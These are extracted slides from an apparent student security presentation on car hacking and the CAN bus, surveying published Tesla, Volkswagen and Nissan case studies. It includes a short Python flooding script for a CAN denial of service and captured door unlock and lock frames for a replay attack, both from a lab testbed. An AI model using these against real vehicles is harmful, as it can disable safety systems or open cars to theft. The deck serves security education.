Slide 1

Slide 1 text

Car Security Attacking On the CAN Bus Student : Tien-Chih Lin@NCKU Advisor : PK, Birdman, Benson, Alan

Slide 2

Slide 2 text

$ Outline • Attack Vector • Intro of CAN Bus • Security Issues on CAN Bus • Conclusion

Slide 3

Slide 3 text

>_ Attack Vector

Slide 4

Slide 4 text

$ Attack Vector Overview

Slide 5

Slide 5 text

$ Physical Attack • Attack Interface • USB Ports • SD-Card Ports • CD-ROM / DVD-ROM • Touch Screen • CAT-5

Slide 6

Slide 6 text

$ Case Study : CAT-5 • DEFCON 23 - How to Hack a Tesla Model S

Slide 7

Slide 7 text

No content

Slide 8

Slide 8 text

$ Scanning with nmap Device IP Port Service CID (Central Information Display) 192.168.90.100 22/tcp ssh 53/tcp domain 80/tcp http 111/tcp rpcbind 2049/tcp nfs 6000/tcp X11 IC (Instrument Cluster) 192.168.90.101 22/tcp ssh 111/tcp rpcbind 6000/tcp X11 Gateway 192.168.90.102 23/tcp telnet 1050/tcp java-or-OTGfileshare

Slide 9

Slide 9 text

No content

Slide 10

Slide 10 text

No content

Slide 11

Slide 11 text

$ Remote Attack • Attack Interface • Bluetooth • Wi-Fi • Cellular Connection • Remote Keyless Entry • TPMS

Slide 12

Slide 12 text

$ Case Study : Remote Keyless Entry • Fix Code UID, btn UID, btn

Slide 13

Slide 13 text

$ Case Study : Remote Keyless Entry • Rolling Code UID, enck ctr′, btn UID, enck ctr′ + 1 , btn UID, enck ctr′ + 2 , btn ctr ctr + ∆ validity windows Decrypt ctr’ if(ctr < ctr’ < ctr + ∆ ) ctr := ctr’ open/close

Slide 14

Slide 14 text

$ Case Study : Remote Keyless Entry • Attack Rolling Code enck UID, ctr′, btn Attack crypto Attack key management

Slide 15

Slide 15 text

$ Wireless Hacking Unlock 100 Million Volkswagens, 2016

Slide 16

Slide 16 text

$ Case Study : API • Controlling vehicle features of Nissan LEAFs across the globe via vulnerable APIs

Slide 17

Slide 17 text

$ Request • GET https://[redacted].com/orchestration_1111/g dc/RemoteACRecordsRequest.php?RegionCo de=NE&lg=noNO&DCMID=&VIN=SJNFAAZE0 U60XXXXX

Slide 18

Slide 18 text

{ status: 200, message: "success", BatteryStatusRecords: { OperationResult: "START", OperationDateAndTime: "jan 21, 2016 21:47", BatteryStatus: { Battery ChargingStatus: "NORMAL_CHARGING", BatteryCapacity: "12", BatteryRemainingAmount: "12", BatteryRemainingAmountWH: "", }, PluginState: "CONNECTED", CruisingRangeAcOn: "135664.0", Cruising RangeAcOff: "157904.0", NotificationDateAndTime: "2016/01/21 20:47", TargetDate: "2016/01/21 20:47" } } $ Respond

Slide 19

Slide 19 text

$ API without Authentication • GET https://[redacted].com/orchestration_1111/g dc/RemoteACRecordsRequest.php?RegionCo de=NE&lg=noNO&DCMID=&VIN=SJNFAAZE0 U60XXXXX • VIN : Vehicle Identification Number

Slide 20

Slide 20 text

No content

Slide 21

Slide 21 text

$ Case Study : Wi-Fi • Black Hat 2017 : Free-fall: Tesla Hacking Get control of Wi-fi Exploit the Webkit Browser Root the in-vehicle system Patch and Disable AppArmor Bypass ECU’s firmware integrity verification Reprogram modified Gateway firmware Send malicious CAN msg on CAN Bus Get Control of CAN Bus CID ECUs

Slide 22

Slide 22 text

Why Hacking the CAN Bus?

Slide 23

Slide 23 text

>_ Intro of CAN Bus

Slide 24

Slide 24 text

$ What is CAN Bus? • Controller Area Network • Low cost, integrated controllers Head light Tail light Dash board Doors ABS Engine Control Suspension Control Gateway Low Speed CAN Body Control Bus High Speed CAN Powertrain Control Bus

Slide 25

Slide 25 text

$ CAN Data Frame Format Arbitration Identifier(ArbID) 11 bits or 29 bits Data Length Code (DLC) 4 bits Data Up to 8 Byte

Slide 26

Slide 26 text

$ CAN Bus Arbitration • Support by Hardware • Software implementation becomes easily and immediacy. • priority : 0 > 1

Slide 27

Slide 27 text

$ Fault Confinement Error Active Error Passive Bus Off Reset and Config REC => 127 or TEC => 127 TEC > 255 Reset, Config and Reception of 128x11 Recessive Bits REC < 127 or TEC < 127 REC: Receive Error Counter TEC: Transmit Error Counter

Slide 28

Slide 28 text

>_ Security Issues on CAN Bus

Slide 29

Slide 29 text

$ Denial-of-Service import ics device = ics.find_devices()[0] ics.open_device(device) NetworkID = ics.NETID_HSCAN ics.set_bit_rate(device,500000,NetworkID) msg = ics.SpyMessage() # Setup the message msg.ArbIDOrHeader = 0x0 # CAN ID msg.NetworkID = NetworkID # Channel 1 on the ValueCAN msg.Data = (0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0) while(1): ics.transmit_messages(device, msg)

Slide 30

Slide 30 text

$ Testbed

Slide 31

Slide 31 text

$ Result

Slide 32

Slide 32 text

$ Replay Attack Head light Tail light Dash board Doors ABS Engine Control Suspension Control Gateway Attacker

Slide 33

Slide 33 text

$ Testbed

Slide 34

Slide 34 text

$ Unlock the Door ArbID Data… 44D 4D,00,80,00,00,00,00,00 440 40,00,80,11,01,0F,0F,0F 442 42,00,80,00,00,00,00,00 44D 4D,01,80,00,01,00,00,00 440 40,01,80,11,01,00,00,00 631 18,80,53,04,00,12,00,00

Slide 35

Slide 35 text

$ Lock the Door ArbID Data… 44D 4D,00,80,00,00,00,00,00 440 40,00,80,11,01,0F,0F,0F 442 42,00,80,00,00,00,00,00 44D 4D,01,80,00,01,00,00,00 440 40,01,80,11,01,00,00,00 631 18,80,53,02,00,12,00,00

Slide 36

Slide 36 text

$ Demo

Slide 37

Slide 37 text

>_ Conclusion • Survey of the Car Security − The skill of cyber security is useful in Car security. • CAN Bus − A useful protocol before the car connect to the Internet. − Easy attack by DoS and replay attack.

Slide 38

Slide 38 text

$ Reference • https://hitcon.org/2018/CMT/slide-files/d2_s0_r0_keynote.pdf • http://www.blackhat.com/docs/asia-15/materials/asia-15-Evenchick-Hopping-On- The-Can-Bus.pdf • http://www.cheyun.com/content/15847 • http://illmatics.com/carhacking.html • https://www.tomshardware.co.uk/intel-automotive-security-review-board,news- 51291.html • https://blog.lookout.com/hacking-a-tesla • https://www.blackhat.com/docs/us-17/thursday/us-17-Nie-Free-Fall-Hacking-Tesla- From-Wireless-To-CAN-Bus.pdf • https://www.cryptacus.eu/en/wp-content/uploads/201611_WG4_Garcia.pdf • https://www.troyhunt.com/controlling-vehicle-features-of-nissan/ • http://wiki.csie.ncku.edu.tw/embedded/CAN • https://goo.gl/kXyyhx